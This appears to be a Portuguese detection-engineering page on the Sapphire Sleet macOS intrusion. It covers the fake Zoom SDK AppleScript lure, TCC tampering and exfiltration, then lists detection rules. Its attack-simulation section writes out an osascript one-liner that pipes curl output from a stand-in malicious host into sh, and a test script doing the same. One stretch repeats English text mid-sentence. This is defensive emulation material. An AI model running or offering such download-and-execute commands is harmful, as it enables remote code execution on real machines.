Dissecando a intrusão macOS do Sapphire Sleet: da isca ao comprometimento
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Microsoft Threat Intelligence relatou uma campanha focada em macOS atribuída ao ator patrocinado pelo Estado norte-coreano Sapphire Sleet. A operação se baseia em engenharia social para persuadir os alvos a executar arquivos AppleScript maliciosos apresentados como uma atualização legítima do Zoom SDK. Uma vez executado, o script recupera cargas adicionais através de curl and osascript, expandindo a intrusão em múltiplas etapas. O malware é projetado para roubar credenciais, dados de carteiras de criptomoedas e outras informações sensíveis, além de contornar as proteções nativas de segurança do macOS para permanecer ativo em sistemas comprometidos.
Investigação
A investigação descreve uma cadeia de infecção em múltiplas etapas que começa com um .scpt arquivo de atração e continua através de uma sequência de curl-para-osascript downloads de carga. Pesquisadores identificaram vários componentes de backdoor, incluindo com.apple.cli, um binário de serviços, icloudz, e com.google.chromes.updaters. Os atores da ameaça também foram observados manipulando o banco de dados TCC do macOS para obter permissões de AppleEvents, usando técnicas de carregamento de código reflexivo, e estabelecendo persistência através de um daemon de inicialização. A atividade de exfiltração contou com strings de agente de usuário personalizados e comunicações pelo Telegram Bot API.
Mitigação
A Apple já lançou atualizações de Safe Browsing e XProtect para interromper a infraestrutura da campanha e os componentes de malware. A Microsoft recomenda bloquear a execução de arquivos .scpt , restringir pipelines inseguros curl , monitorar mudanças não autorizadas no banco de dados TCC e auditar instalações de daemon de inicialização para entradas suspeitas. Os usuários também devem ser advertidos sobre prompts de atualização de software não solicitados e orientados a não fornecer credenciais por meio de diálogos ou scripts inesperados.
Resposta
Os defensores devem detectar a execução maliciosa de AppleScript, strings de agente de usuário anormais e conexões de saída para domínios de comando e controle conhecidos. Quaisquer binários identificados e daemons de inicialização devem ser colocados em quarentena ou removidos imediatamente, seguidos por redefinições de credenciais para usuários afetados e validação da integridade do banco de dados TCC. Respondedores de incidentes também devem realizar análises forenses em artefatos de sistemas coletados e restaurar dados impactados a partir de backups limpos sempre que necessário. curl user-agent strings, and outbound connections to known command-and-control domains. Any identified binaries and launch daemons should be quarantined or removed immediately, followed by credential resets for affected users and validation of TCC database integrity. Incident responders should also perform forensic analysis on collected system artifacts and restore impacted data from clean backups wherever necessary.
Fluxo de Ataque
Detecções
Possíveis Comunicações C2 Sob HTTP Para IP Direto Com Porta Incomum (via proxy)
Visualizar
Possível Execução Utilizando chmod e nohup em Comando Único (via cmdline)
Visualizar
Validação de Credenciais do MacOS via Dscl Authonly (via cmdline)
Visualizar
Tentativa Suspeita de Execução de Curl [MacOS] (via cmdline)
Visualizar
Arquivo Foi Criado Na Pasta Temporária do MacOS (via file_event)
Visualizar
Permissões Perigosas para um Binário/Script/Pasta foram definidas (via cmdline)
Visualizar
IOCs (HashSha256) para detectar: Dissecando a intrusão em macOS do Sapphire Sleet da atração à comprometimento
Visualizar
IOCs (SourceIP) para detectar: Dissecando a intrusão em macOS do Sapphire Sleet da atração à comprometimento
Visualizar
IOCs (DestinationIP) para detectar: Dissecando a intrusão em macOS do Sapphire Sleet da atração à comprometimento
Visualizar
Detecção de Comunicação C2 do Sapphire Sleet [Conexão de Rede Linux]
Visualizar
Detecção de Execução de AppleScript com Curl Tube no macOS [Criação de Processo Linux]
Visualizar
Execução de Simulação
Pré-requisito: A Verificação de Telemetria e Linha de Base Pré‑voo deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa de Ataque & Comandos:
Um adversário obteve um script estilo PowerShell malicioso hospedado em um servidor remoto. Para evitar a criação de um binário autônomo, eles aproveitam o interpretador nativo do AppleScript (osascript) e encaminham umcurldownload diretamente no interpretador, alcançando um “download‑e‑executar” em um único comando. Isso corresponde aoosascript+curlpadrão da regra.# Linha única maliciosa que deve acionar a regra osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'A linha de comando contém ambos
osascriptandcurl, então a condição da regra Sigma (selection_osascript and selection_curl) avalia como verdadeiro. -
Script de Teste de Regressão:
# simulate_osascript_curl.sh # Propósito: Reproduzir a telemetria exata que deve disparar a regra de detecção. set -e # Defina uma carga inofensiva para segurança (echo em vez de código maligno real) MALICIOUS_URL="https://example.com/benign_payload.sh" # Crie uma carga benigna fictícia que apenas imprime uma mensagem. # Em um teste real de equipe vermelha, você hospedaria um script real; aqui o mantemos seguro. curl -s -o /tmp/benign_payload.sh "$MALICIOUS_URL" || true # Execute o AppleScript com curl encanado em um comando shell. osascript -e "do shell script "curl -s $MALICIOUS_URL | sh"" -
Comandos de Limpeza:
# cleanup_osascript_curl.sh # Remova quaisquer arquivos temporários e encerre processos errantes. rm -f /tmp/benign_payload.sh pkill -f "osascript -e"